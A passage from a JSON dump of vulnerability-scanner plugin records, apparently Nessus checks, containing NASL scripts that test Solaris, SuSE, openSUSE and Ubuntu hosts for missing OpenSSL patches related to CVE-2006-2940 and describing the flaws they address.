\"CVE-2006-2940\", \"CVE-2006-4339\", \"CVE-2006-5201\", \"CVE-2006-7140\");\n\n script_name(english:\"Solaris 9 (x86) : 122715-03\");\n script_summary(english:\"Check for patch 122715-03\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 122715-03\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"SunOS 5.9_x86: wanboot and pkg utilities Patch.\nDate this patch was last updated by Sun : Oct/31/11\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/122715-03\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"You should install this patch for your system to be up-to-date.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_cwe_id(310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/10/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"122715-03\", obsoleted_by:\"\", package:\"SUNWcsu\", version:\"11.9.0,REV=2002.11.04.02.51\") < 0) flag++;\nif (solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"122715-03\", obsoleted_by:\"\", package:\"SUNWarc\", version:\"11.9.0,REV=2002.11.04.02.51\") < 0) flag++;\nif (solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"122715-03\", obsoleted_by:\"\", package:\"SUNWwbsup\", version:\"11.9.0,REV=2003.08.06.17.39\") < 0) flag++;\nif (solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"122715-03\", obsoleted_by:\"\", package:\"SUNWhea\", version:\"11.9.0,REV=2002.11.04.02.51\") < 0) flag++;\nif (solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"122715-03\", obsoleted_by:\"\", package:\"SUNWcsr\", version:\"11.9.0,REV=2002.11.04.02.51\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-08-19T13:12:36", "description": "A previous openssl update (CVE-2006-2940) introduced another bug that can lead to a crash by providing a large prime number. An uninitialized pointer is freed during error handling. This bug allows remote attackers to crash services that use openssl.", "cvss3": {"score": null, "vector": null}, "published": "2007-12-13T00:00:00", "type": "nessus", "title": "SuSE 10 Security Update : OpenSSL (ZYPP Patch Number 2175)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2940"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_OPENSSL-2175.NASL", "href": "https://www.tenable.com/plugins/nessus/29543", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(29543);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-2940\");\n\n script_name(english:\"SuSE 10 Security Update : OpenSSL (ZYPP Patch Number 2175)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A previous openssl update (CVE-2006-2940) introduced another bug that\ncan lead to a crash by providing a large prime number. An\nuninitialized pointer is freed during error handling. This bug allows\nremote attackers to crash services that use openssl.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2006-2940.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 2175.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/10/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:0, reference:\"openssl-0.9.8a-18.13\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:0, reference:\"openssl-devel-0.9.8a-18.13\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:0, cpu:\"x86_64\", reference:\"openssl-32bit-0.9.8a-18.13\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:0, cpu:\"x86_64\", reference:\"openssl-devel-32bit-0.9.8a-18.13\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"openssl-0.9.8a-18.13\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, reference:\"openssl-devel-0.9.8a-18.13\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, cpu:\"x86_64\", reference:\"openssl-32bit-0.9.8a-18.13\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:0, cpu:\"x86_64\", reference:\"openssl-devel-32bit-0.9.8a-18.13\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-08-19T13:12:43", "description": "USN-353-1 fixed several vulnerabilities in OpenSSL. However, Mark J Cox noticed that the applied patch for CVE-2006-2940 was flawed. This update corrects that patch.\n\nFor reference, this is the relevant part of the original advisory :\n\nCertain types of public key could take disproportionate amounts of time to process. The library now limits the maximum key exponent size to avoid Denial of Service attacks. (CVE-2006-2940).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2007-11-10T00:00:00", "type": "nessus", "title": "Ubuntu 5.04 / 5.10 / 6.06 LTS : openssl vulnerability (USN-353-2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2940"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libssl-dev", "p-cpe:/a:canonical:ubuntu_linux:libssl0.9.7", "p-cpe:/a:canonical:ubuntu_linux:libssl0.9.8", "p-cpe:/a:canonical:ubuntu_linux:libssl0.9.8-dbg", "p-cpe:/a:canonical:ubuntu_linux:openssl", "cpe:/o:canonical:ubuntu_linux:5.04", "cpe:/o:canonical:ubuntu_linux:5.10", "cpe:/o:canonical:ubuntu_linux:6.06:-:lts"], "id": "UBUNTU_USN-353-2.NASL", "href": "https://www.tenable.com/plugins/nessus/27934", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-353-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(27934);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2006-2940\");\n script_bugtraq_id(20247);\n script_xref(name:\"USN\", value:\"353-2\");\n\n script_name(english:\"Ubuntu 5.04 / 5.10 / 6.06 LTS : openssl vulnerability (USN-353-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"USN-353-1 fixed several vulnerabilities in OpenSSL. However, Mark J\nCox noticed that the applied patch for CVE-2006-2940 was flawed. This\nupdate corrects that patch.\n\nFor reference, this is the relevant part of the original advisory :\n\nCertain types of public key could take disproportionate amounts of\ntime to process. The library now limits the maximum key exponent size\nto avoid Denial of Service attacks. (CVE-2006-2940).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/353-2/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libssl-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libssl0.9.7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libssl0.9.8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libssl0.9.8-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/10/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/11/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2007-2019 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(5\\.04|5\\.10|6\\.06)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 5.04 / 5.10 / 6.06\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libssl-dev\", pkgver:\"0.9.7e-3ubuntu0.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libssl0.9.7\", pkgver:\"0.9.7e-3ubuntu0.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"openssl\", pkgver:\"0.9.7e-3ubuntu0.6\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"libssl-dev\", pkgver:\"0.9.7g-1ubuntu1.5\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"libssl0.9.7\", pkgver:\"0.9.7g-1ubuntu1.5\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"openssl\", pkgver:\"0.9.7g-1ubuntu1.5\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libssl-dev\", pkgver:\"0.9.8a-7ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libssl0.9.8\", pkgver:\"0.9.8a-7ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libssl0.9.8-dbg\", pkgver:\"0.9.8a-7ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"openssl\", pkgver:\"0.9.8a-7ubuntu0.3\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libssl-dev / libssl0.9.7 / libssl0.9.8 / libssl0.9.8-dbg / openssl\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-08-19T13:13:17", "description": "A previous openssl update (CVE-2006-2940) introduced another bug that can lead to a crash by providing a large prime number. An uninitialized pointer is freed during error handling. This bug allows remote attackers to crash services that use openssl.", "cvss3": {"score": null, "vector": null}, "published": "2007-10-17T00:00:00", "type": "nessus", "title": "openSUSE 10 Security Update : openssl (openssl-2349)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2940"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:openssl", "p-cpe:/a:novell:opensuse:openssl-32bit", "p-cpe:/a:novell:opensuse:openssl-devel", "p-cpe:/a:novell:opensuse:openssl-devel-32bit", "cpe:/o:novell:opensuse:10.2"], "id": "SUSE_OPENSSL-2349.NASL", "href": "https://www.tenable.com/plugins/nessus/27370", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openssl-2349.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(27370);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-2940\");\n\n script_name(english:\"openSUSE 10 Security Update : openssl (openssl-2349)\");\n script_summary(english:\"Check for the openssl-2349 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A previous openssl update (CVE-2006-2940) introduced another bug that\ncan lead to a crash by providing a large prime number. An\nuninitialized pointer is freed during error handling. This bug allows\nremote attackers to crash services that use openssl.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssl packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssl-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssl-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.2\", reference:\"openssl-0.9.8d-17.2\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"openssl-devel-0.9.8d-17.2\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", cpu:\"x86_64\", reference:\"openssl-32bit-0.9.8d-17.2\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", cpu:\"x86_64\", reference:\"openssl-devel-32bit-0.9.8d-17.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl / openssl-32bit / openssl-devel / openssl-devel-32bit\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-08-19T13:13:32", "description": "A previous openssl update (CVE-2006-2940) introduced another bug that can lead to a crash by providing a large prime number. An uninitialized pointer is freed during error handling. This bug allows remote attackers to crash services that use openssl.", "cvss3": {"score": null, "vector": null}, "published": "2007-10-17T00:00:00", "type": "nessus", "title": "openSUSE 10 Security Update : openssl (openssl-2162)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2940"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:openssl", "p-cpe:/a:novell:opensuse:openssl-32bit", "p-cpe:/a:novell:opensuse:openssl-devel", "p-cpe:/a:novell:opensuse:openssl-devel-32bit", "cpe:/o:novell:opensuse:10.1"], "id": "SUSE_OPENSSL-2162.NASL", "href": "https://www.tenable.com/plugins/nessus/27369", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openssl-2162.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(27369);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-2940\");\n\n script_name(english:\"openSUSE 10 Security Update : openssl (openssl-2162)\");\n script_summary(english:\"Check for the openssl-2162 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A previous openssl update (CVE-2006-2940) introduced another bug that\ncan lead to a crash by providing a large prime number. An\nuninitialized pointer is freed during error handling. This bug allows\nremote attackers to crash services that use openssl.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssl packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssl-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssl-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/10/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.1\", reference:\"openssl-0.9.8a-18.13\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"openssl-devel-0.9.8a-18.13\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", cpu:\"x86_64\", reference:\"openssl-32bit-0.9.8a-18.13\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", cpu:\"x86_64\", reference:\"openssl-devel-32bit-0.9.8a-18.13\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl / openssl-32bit / openssl-devel / openssl-devel-32bit\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-08-19T13:09:43", "description": "The version of Attachmate Reflection for Secure IT UNIX Server installed on the remote host is lower than 7.0 SP1 and thus reportedly affected by several issues : \n\n - There is an inherited vulnerability in OpenSSL when parsing malformed ASN.1 structures leading to a denial of service vulnerability (CVE-2006-2937).\n - There is an inherited vulnerability in OpenSSL when parsing parasitic public keys leading to a denial of service vulnerability (CVE-2006-2940).\n - There is an inherited vulnerability in OpenSSL when performing Montgomery multiplication, leading to a side-channel attack vulnerability (CVE-2007-3108).\n - There is an inherited vulnerability in OpenSSH with the execution of the ~/.ssh2/rc session file (CVE-2008-1657).\n - There is an issue with the security of forwarded X11 connections, leading to possible hijacking. (CVE-2008-1483)\n - There are multiple unspecified other vulnerabilities.", "cvss3": {"score": 5.6, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "published": "2008-08-20T00:00:00", "type": "nessus", "title": "Attachmate Reflection for Secure IT UNIX Server < 7.0 SP1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-1483", "CVE-2006-2940", "CVE-2006-2937", "CVE-2008-1657", "CVE-2007-3108", "CVE-2008-6021"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:attachmate:reflection:*:*:*:*:*:*:*:*"], "id": "4632.PRM", "href": "https://www.tenable.com/plugins/nnm/4632", "sourceData": "Binary data 4632.prm", "cvss": {"score": 5.1, "vector": "CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T02:52:09", "description": "The version of Attachmate Reflection for Secure IT UNIX server installed on the remote host is less than 7.0 SP1 and thus reportedly affected by several issues :\n\n - There is an inherited vulnerability in OpenSSL when parsing malformed ASN.1 structures leading to a denial of service vulnerability (CVE-2006-2937).\n\n - There is an inherited vulnerability in OpenSSL when parsing parasitic public keys leading to a denial of service vulnerability (CVE-2006-2940).\n\n - There is an inherited vulnerability in OpenSSL when performing Montgomery multiplication, leading to a side-channel attack vulnerability (CVE-2007-3108).\n\n - There is an inherited vulnerability in OpenSSH with the execution of the ~/.ssh2/rc session file (CVE-2008-1657).\n\n - There is an issue with the security of forwarded X11 connections, leading to possible hijacking.\n (CVE-2008-1483)\n\n - There are multiple unspecified other vulnerabilities.\n (CVE-2008-6021)", "cvss3": {"score": 10, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2008-08-20T00:00:00", "type": "nessus", "title": "Attachmate Reflection for Secure IT UNIX server < 7.0 SP1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2007-3108", "CVE-2008-1483", "CVE-2008-1657", "CVE-2008-6021"], "modified": "2020-12-22T00:00:00", "cpe": ["cpe:/a:attachmate:reflection_for_secure_it"], "id": "ATTACHMATE_REFLECTION_70_SP1.NASL", "href": "https://www.tenable.com/plugins/nessus/33948", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33948);\n script_version(\"1.22\");\n\n script_cve_id(\n \"CVE-2006-2937\",\n \"CVE-2006-2940\",\n \"CVE-2007-3108\",\n \"CVE-2008-1483\",\n \"CVE-2008-1657\",\n \"CVE-2008-6021\"\n );\n script_bugtraq_id(28444, 30723);\n script_xref(name:\"Secunia\", value:\"31531\");\n\n script_name(english:\"Attachmate Reflection for Secure IT UNIX server < 7.0 SP1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks if SSH banner < 7.0.1.575\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SSH service is affected by multiple vulnerabilities.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The version of Attachmate Reflection for Secure IT UNIX server\ninstalled on the remote host is less than 7.0 SP1 and thus reportedly\naffected by several issues :\n\n - There is an inherited vulnerability in OpenSSL when\n parsing malformed ASN.1 structures leading to a\n denial of service vulnerability (CVE-2006-2937).\n\n - There is an inherited vulnerability in OpenSSL when\n parsing parasitic public keys leading to a\n denial of service vulnerability (CVE-2006-2940).\n\n - There is an inherited vulnerability in OpenSSL when\n performing Montgomery multiplication, leading to a\n side-channel attack vulnerability (CVE-2007-3108).\n\n - There is an inherited vulnerability in OpenSSH with the\n execution of the ~/.ssh2/rc session file\n (CVE-2008-1657).\n\n - There is an issue with the security of forwarded X11\n connections, leading to possible hijacking.\n 